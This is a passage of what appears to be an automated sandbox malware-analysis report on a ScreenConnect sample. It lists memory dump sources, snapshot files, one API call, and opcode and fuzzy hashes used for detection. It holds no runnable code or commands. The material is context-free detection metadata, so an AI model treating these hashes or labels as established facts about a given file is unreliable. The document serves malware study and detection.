                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 087c37893f3123e2e55de5028c53cfdff5392e9558ea5fb039be4f0cbaed55da
                                                                • Instruction ID: ad1d712c1b76891fa32fa2e9435ff11b66b689b987c742890930438f57cf58ba
                                                                • Opcode Fuzzy Hash: 087c37893f3123e2e55de5028c53cfdff5392e9558ea5fb039be4f0cbaed55da
                                                                • Instruction Fuzzy Hash: 1E1103B1C046499FDB10DF9AC4447AEFBF4EB88324F10846AD959A7240D378A549CFA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [!
                                                                • API String ID: 0-4044816477
                                                                • Opcode ID: a60578a60f552954799ef8ef01c62145fc4dd9607902b5e67bed6319d0030395
                                                                • Instruction ID: d8a57364779a5d7b2c4455fc2edf32a899beef59776fa9601f110491ef5e83c4
                                                                • Opcode Fuzzy Hash: a60578a60f552954799ef8ef01c62145fc4dd9607902b5e67bed6319d0030395
                                                                • Instruction Fuzzy Hash: 0AB15D30A102169FDB19DF68E490A9EB7F2EF85354B14C56DD509AB364EF31EC06CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: 673ad56431dbedb2cc6039674845c393858c7857bad94fd3bb673dad379e66e8
                                                                • Instruction ID: dfc308ddb65d062cd4933bafd81f1ce87d86ad819801967dffa8cb77a43efcca
                                                                • Opcode Fuzzy Hash: 673ad56431dbedb2cc6039674845c393858c7857bad94fd3bb673dad379e66e8
                                                                • Instruction Fuzzy Hash: DF618B75B002149FDB18EB79D854AAEBBF6FF89210B14856DD506EB380DF35AC428B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: 1c7007eab10c8f8bd9b9c64cf67536c6f659cd90b1eb997e1a211f5de44ecd31
                                                                • Instruction ID: 96268ebe0a9f381e37c54c2681b0ae9178400248613af6069871b9d3529b5854
                                                                • Opcode Fuzzy Hash: 1c7007eab10c8f8bd9b9c64cf67536c6f659cd90b1eb997e1a211f5de44ecd31
                                                                • Instruction Fuzzy Hash: B251A135B002148FDB18DB78D894AAEBBF6FF89310B558569E506EB340DF75AC42CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: 36b14cbb2bb9781326483acd4ef5bfd4d8eb55106b686cc2dbe3219e3e3f1497
                                                                • Instruction ID: ef4b07682b4ffebb7fc65041f4f4eb32d318055b601ab151f3f7614aa97594c0
                                                                • Opcode Fuzzy Hash: 36b14cbb2bb9781326483acd4ef5bfd4d8eb55106b686cc2dbe3219e3e3f1497
                                                                • Instruction Fuzzy Hash: C1219539B002249BDB18EB75D8545AE7BF6EBC8610F10847DE906E7384DF359C02CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: >Xq
                                                                • API String ID: 0-2782909797
                                                                • Opcode ID: 6c694365c89ddbf3255f733d584edfb22e57b79ae424affa2d583fe6e6231de9
                                                                • Instruction ID: c81884550521357f12947fa99a1a3c51c5a65d468ef64b9c54f9f0f494b0d81f
                                                                • Opcode Fuzzy Hash: 6c694365c89ddbf3255f733d584edfb22e57b79ae424affa2d583fe6e6231de9
                                                                • Instruction Fuzzy Hash: 65F0A731B093581FE7069AB95C102EA3F76AB426A0F1844EAD449D7282D9654D0583D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: >Xq
                                                                • API String ID: 0-2782909797
                                                                • Opcode ID: 06398c24d77c7c514ac0693b80c17ad018629d61141d642488b8f5ada1d57537
                                                                • Instruction ID: 13c9c89c3fec7066de9fb61c7d5bf37aba3a8814de3bc5fb75921231c9898b15
                                                                • Opcode Fuzzy Hash: 06398c24d77c7c514ac0693b80c17ad018629d61141d642488b8f5ada1d57537
                                                                • Instruction Fuzzy Hash: 6EE065367042285BDB08DBBAA8146EEBBBAEB846B0B14406AE509D7740DE719D4187C4
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0baef3393369b0c89225d5d4a7e482160cfb15184915656061ba5ea166098888
                                                                • Instruction ID: 4772a9484c8cb4871ed1a0e184568706a25aa9fb5c9d31c5f20e433133bc6bda
                                                                • Opcode Fuzzy Hash: 0baef3393369b0c89225d5d4a7e482160cfb15184915656061ba5ea166098888
                                                                • Instruction Fuzzy Hash: B3324C35A00615CFEB54DF68D998AADBBB2FF88300F1185D9E509AB361DB70AD85CF40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d38b6b978a7eb0454b82d9fbf45b8f49a7f8532bcbdaa9d14fa61696582d31f9
                                                                • Instruction ID: 45ca8d0d6618a4acbee9e00fbd3fd90f922b06543e46cae9071cdadcf2ffdc9d
                                                                • Opcode Fuzzy Hash: d38b6b978a7eb0454b82d9fbf45b8f49a7f8532bcbdaa9d14fa61696582d31f9
                                                                • Instruction Fuzzy Hash: 24325D34A10619CFDB64DF68D998ADDBBB2FF88300F108599E509AB365DB70AD81CF40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3532a48f21a7e2fa68c909c798886b9b61091ab7d1f7cd17cdd69cf3b78cc773
                                                                • Instruction ID: d4d151d8d7e2c79ddaaa1a15cce385b531c777fc8f05d813af43feb3bd7e9771
                                                                • Opcode Fuzzy Hash: 3532a48f21a7e2fa68c909c798886b9b61091ab7d1f7cd17cdd69cf3b78cc773
                                                                • Instruction Fuzzy Hash: CCF13974A002299FEB24CF65C990BEDBBB6BF48304F1085DAD909AB351DB719E85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fee433fb56417f77d03f7e5580e74a77dce6959554921501a0732484aa4fafb3
                                                                • Instruction ID: eb1e71709016ec75a6f80c36ba6e2f01dc27c7ae96f508411f8e302076893c58
                                                                • Opcode Fuzzy Hash: fee433fb56417f77d03f7e5580e74a77dce6959554921501a0732484aa4fafb3
                                                                • Instruction Fuzzy Hash: FEA1C3306103569FD719EF78E4606EEBBF2FF8A310B008A6DC1459B751EF70A9098B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e6ec33dee3b5f61688feb1863a362fdc5a3bd35af7a686bd2f25c9c41f16e6b9
                                                                • Instruction ID: 0ce2c1bbf639159934e7a58ed129e423e24568d626702e8f3b98fd66f6dd069a
                                                                • Opcode Fuzzy Hash: e6ec33dee3b5f61688feb1863a362fdc5a3bd35af7a686bd2f25c9c41f16e6b9
                                                                • Instruction Fuzzy Hash: A2818176F1021A8BEB19EFB5C8506AEB7B2EFC8700F148529E406AB384DF749D45C791
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e7ecf540de993879ab65844f32abb415659ba63f93b8fee288e8364e006e455
                                                                • Instruction ID: 174f7276f1e1158d3b12775403bb369ca90e46df3053b126d18646ccb3216978
                                                                • Opcode Fuzzy Hash: 3e7ecf540de993879ab65844f32abb415659ba63f93b8fee288e8364e006e455
                                                                • Instruction Fuzzy Hash: D0915C74A00219CFDB18DF28D994AADBBF6FF89300F1485A9E50AA7350DB31AD85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6098e5ae67be95032b06c01083848baf827304cb92c8d5518bbd692de46672f6
                                                                • Instruction ID: 7c70d0b536ceb86701d76fa3ab3bdbdf3abf56062990e24851ae1bf65eddd1e9
                                                                • Opcode Fuzzy Hash: 6098e5ae67be95032b06c01083848baf827304cb92c8d5518bbd692de46672f6
                                                                • Instruction Fuzzy Hash: AD811C34B01205CFEB14DF68D894AAEB7B2FF8D314B148559EA15AB365DB70EC05CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ab2779762017c7377d645b015820b97487a3fbb01474b442709ffd8e5e5d137
                                                                • Instruction ID: b18e0d07a65402298470fa547e565f36d328fa0f567574fbd1a33cf1a6201f47
                                                                • Opcode Fuzzy Hash: 0ab2779762017c7377d645b015820b97487a3fbb01474b442709ffd8e5e5d137
                                                                • Instruction Fuzzy Hash: 51717E35B002068BCB05DBA9C464A6EBBB7EFD5210718826ED605DB364DF75EC028B91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db2cf6329c4d77a7c4022f4b4ec3d85959668004a64bec17596f04759f0387eb
                                                                • Instruction ID: bf50c631eeb7ad1655e8254cf7f686eb7f0d29e583c20116d403777fcfcd112d
                                                                • Opcode Fuzzy Hash: db2cf6329c4d77a7c4022f4b4ec3d85959668004a64bec17596f04759f0387eb
                                                                • Instruction Fuzzy Hash: F671E431F003499BDB19DF65D850AAEBBB2FF89300F14896AD401AF345EF75984ACB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f11cafea0e638dfb5fafc3876bd8f4900d72596dc64096e414180cffc9b44507
                                                                • Instruction ID: 55a2f3b48a467154bc82a2942a3f45f62935d15b54d20bc38c2a608c6f98521a
                                                                • Opcode Fuzzy Hash: f11cafea0e638dfb5fafc3876bd8f4900d72596dc64096e414180cffc9b44507
                                                                • Instruction Fuzzy Hash: F3815E306107169FE719EB79E4646AEBBF2FF99300B408A6CC1459B754EF71A9088BD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55e46d7225ed60d90e12711260b52b22ea221ab5012cfb75ccc3d1d45698cf4f
                                                                • Instruction ID: 072803366384dc03d21397bee9135a585a2a740a3da9bfe22a83a43deff52abe
                                                                • Opcode Fuzzy Hash: 55e46d7225ed60d90e12711260b52b22ea221ab5012cfb75ccc3d1d45698cf4f
                                                                • Instruction Fuzzy Hash: A7912A74A00215CFDB18DF68D994AADBBF2FF88310F1485A9E50AAB354DB71AD85CF40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92beba9411c5c13bf08468091c1826dbbdf504598a6990c50961b6a6c5017717
                                                                • Instruction ID: 6281110157904219f1f4f14f33dc7c9c38223e0ed26ec24f985d23f0ce8e49a7
                                                                • Opcode Fuzzy Hash: 92beba9411c5c13bf08468091c1826dbbdf504598a6990c50961b6a6c5017717
                                                                • Instruction Fuzzy Hash: D461D271F102198FDB14EB68D494AAEBBF6FF99614B14846AD506DB360DF30DC06CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a7e2cf823fdd0d1d90c5dbe2170b07e8fd27ade00f702ff3a3661db113c458a
                                                                • Instruction ID: ddbddbae1bc9903be66356e3b178cb7a4d1d734bd52d3493ce35e8ab3525dce3
                                                                • Opcode Fuzzy Hash: 4a7e2cf823fdd0d1d90c5dbe2170b07e8fd27ade00f702ff3a3661db113c458a
                                                                • Instruction Fuzzy Hash: 80717E30A102059FEB19EF75E9946AE7BB2FF85210B54C92CE5069B394EF759C06CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e4b54467b7c6230663369da2344c524c53860481c128a4b5a45653c3b7d8dd7
                                                                • Instruction ID: ad4155255f043fd82daf1b1a420ccb08aa7b02804282a5d71e28bfec2caeb67e
                                                                • Opcode Fuzzy Hash: 8e4b54467b7c6230663369da2344c524c53860481c128a4b5a45653c3b7d8dd7
                                                                • Instruction Fuzzy Hash: 6C91EC3590060ADFCB04DF68C580989BBF1FF99314B25C69AD919AB315E771FA46CF80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 650f81783faa64842e8a0d4cc4fd3cc21795f87d828bc1706490dbf043a87241
                                                                • Instruction ID: f0edbd5dddb6b327041f164455435c2fdcb1cdaa63dc3c694478e88c490e068a
                                                                • Opcode Fuzzy Hash: 650f81783faa64842e8a0d4cc4fd3cc21795f87d828bc1706490dbf043a87241
                                                                • Instruction Fuzzy Hash: 04618F34B002168FEB04DF69D894AAEBBF6FF89300B148669D515EB350DB75EC46CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78ff18e696b046c34e2af8a71d17d8260df214cb22ca30bb1c9deb1e73497dc6
                                                                • Instruction ID: 1a380b6239a47ea3b6e0662835f4106393dc9b493f42494b3c7117ccc53d82be
                                                                • Opcode Fuzzy Hash: 78ff18e696b046c34e2af8a71d17d8260df214cb22ca30bb1c9deb1e73497dc6
                                                                • Instruction Fuzzy Hash: B2614C31604B05CFEB34DF29E454696BBF6EF84310B008B2DE19687694EB70E94ACF90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e5cbfa993e897be2218f6586bfc708317ddcef051c602fbcc03aac9e30ce4bb
                                                                • Instruction ID: bf30a37e552e5663d9d230df8bc07923f05225fdc18e1180ff8dc2618a868eb4
                                                                • Opcode Fuzzy Hash: 2e5cbfa993e897be2218f6586bfc708317ddcef051c602fbcc03aac9e30ce4bb
                                                                • Instruction Fuzzy Hash: 91617B74A14209DFEB18CF59D995FAEBBF2BF44314F058468E422AB261CBB4D910CF90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42b4ba3142d9379f7d949bcacd1dee00db8faae85755c2c43afb65227fcfc2dc
                                                                • Instruction ID: 075047c7a465e07f9dfad552d450daa7e16a78922027c5840c93b788d5c9e891
                                                                • Opcode Fuzzy Hash: 42b4ba3142d9379f7d949bcacd1dee00db8faae85755c2c43afb65227fcfc2dc
                                                                • Instruction Fuzzy Hash: FB71C874A102299FEB68DF68D994BEDBBB2BF88300F1085E9D509A7350DB709D858F50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da4bd95046607b292ad1a5a23740305c481cc505ea498acc76d212869deff440
                                                                • Instruction ID: a9e1c8a535dbc6701d56898c2db946490df7e313f3ee3d917d0077810efb395a
                                                                • Opcode Fuzzy Hash: da4bd95046607b292ad1a5a23740305c481cc505ea498acc76d212869deff440
                                                                • Instruction Fuzzy Hash: BF51D130B013129BE715EB78A89066F77E6EFDA304B14896AD41ACB350EF70EC4687D0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f84f44ebbdd2251e024df1b0cda322efac3f9594833ad55faa0d1c5227d036e
                                                                • Instruction ID: 1b6ab8d2f6990a3f3f74fe95788a932e580bc2564c037be2a92f0cc7fe705dec
                                                                • Opcode Fuzzy Hash: 1f84f44ebbdd2251e024df1b0cda322efac3f9594833ad55faa0d1c5227d036e
                                                                • Instruction Fuzzy Hash: 83612E74A01215CFEB24DF28C999BE9BBB2FF84305F118499D509AB362DBB59D80CF41
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13a5e8b312894a99d8eb0e58e4ee73a3dc4495dc95a314961d1ac587aaec43ec
                                                                • Instruction ID: 11f801f72fd589d78bd08f09291875c4f013911005dc0d22cabcc43f2751f73f
                                                                • Opcode Fuzzy Hash: 13a5e8b312894a99d8eb0e58e4ee73a3dc4495dc95a314961d1ac587aaec43ec
                                                                • Instruction Fuzzy Hash: 76517E31A102158FEB29EF75E9946AE7BB2FF85240B44C92CD5069B394EF759C06CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5a984038b1d51912d8c47e56828a4c61327372c5a1c03536343f486a87da4a7a
                                                                • Instruction ID: 75a526ff8b3d1a4a84fbf258aa9985a4df827dc465509a529e5a10d6e1ac51b7
                                                                • Opcode Fuzzy Hash: 5a984038b1d51912d8c47e56828a4c61327372c5a1c03536343f486a87da4a7a
                                                                • Instruction Fuzzy Hash: A551B330B013528FD716DB7898A067A7BE6EFDA30471885AAC016CB395EF70DC46C791
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b661a81b430a449d630d9ad16f2c4fa2eb44fe2c21e10ffe307ce81ddff5a8bf
                                                                • Instruction ID: 88c4d1539dfdfa171691a4de65a1c173b69bbc2707d30831af5e1b717fe3e997
                                                                • Opcode Fuzzy Hash: b661a81b430a449d630d9ad16f2c4fa2eb44fe2c21e10ffe307ce81ddff5a8bf
                                                                • Instruction Fuzzy Hash: C2515C30600B05CFEB34DF29E45469ABBF6EF94310B048B2DE19687694EB74E949CF90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 405fc03eb4d213a38bc335df37bb2009f214e3575cdd882ac0883f787400068d
                                                                • Instruction ID: e0bd20a21b2fa8ca98382147d724e50f9d2ff848dd2e8f19a66d2246c86fa44f
                                                                • Opcode Fuzzy Hash: 405fc03eb4d213a38bc335df37bb2009f214e3575cdd882ac0883f787400068d
                                                                • Instruction Fuzzy Hash: F6512C30600B05CFE734DF29E454696BBF6EF94310B008B2DE19687694EB74E949CF91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e1029c3e75b54e6ecff5ff9dea90e0127bb381fea7134d2708c9e11790eb210
                                                                • Instruction ID: ca3b68210e38d60632c7b8d44fa99056fe96e918e4514e0035cc237f23dc7e62
                                                                • Opcode Fuzzy Hash: 7e1029c3e75b54e6ecff5ff9dea90e0127bb381fea7134d2708c9e11790eb210
                                                                • Instruction Fuzzy Hash: B951F930700606CFCB24DF7AD894A5AB7F6FF89310B148A6DE596DB764E730E8058B94
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 953ca7974f15fcf6eed61a7ad6d7079687652f781200af4dfa282df3fde733fe
                                                                • Instruction ID: de5641f1d72bcbd319bccd227fac3df3aa7866dcbaea92962bb8cb08747f1632
                                                                • Opcode Fuzzy Hash: 953ca7974f15fcf6eed61a7ad6d7079687652f781200af4dfa282df3fde733fe
                                                                • Instruction Fuzzy Hash: 5441D535B042198BFB28AB75E4587FEBBB6EB88310F148529D402E73C4DFB09C058B95
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2eb8aac3c973f1bf516f70c692a32e36ee6b6f8706aa687ee01743a3ba51fc8d
                                                                • Instruction ID: 83f1f391306190dd6af320b8d0b4b7de4430582432388f9b2832d693f41a80e5
                                                                • Opcode Fuzzy Hash: 2eb8aac3c973f1bf516f70c692a32e36ee6b6f8706aa687ee01743a3ba51fc8d
                                                                • Instruction Fuzzy Hash: 45513E74B002168BEB05DF69D890AAEF7F2FF89300B148669D515AB354EB70EC16CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ed880f70ac7d8281edbfff92b30dfa1dea5fd85a010c60b5d1c28545eba4f18
                                                                • Instruction ID: 6316672e1f3829f50e8ab6f49d29f76a4748bfbb75d23fbe68e978a1d22df66a
                                                                • Opcode Fuzzy Hash: 0ed880f70ac7d8281edbfff92b30dfa1dea5fd85a010c60b5d1c28545eba4f18
                                                                • Instruction Fuzzy Hash: 3C41C630610706CFCB34DF29D858666B7F5FF99314B184A6CE596DB6A4EB30E806CB84
                                                                Memory Dump Source
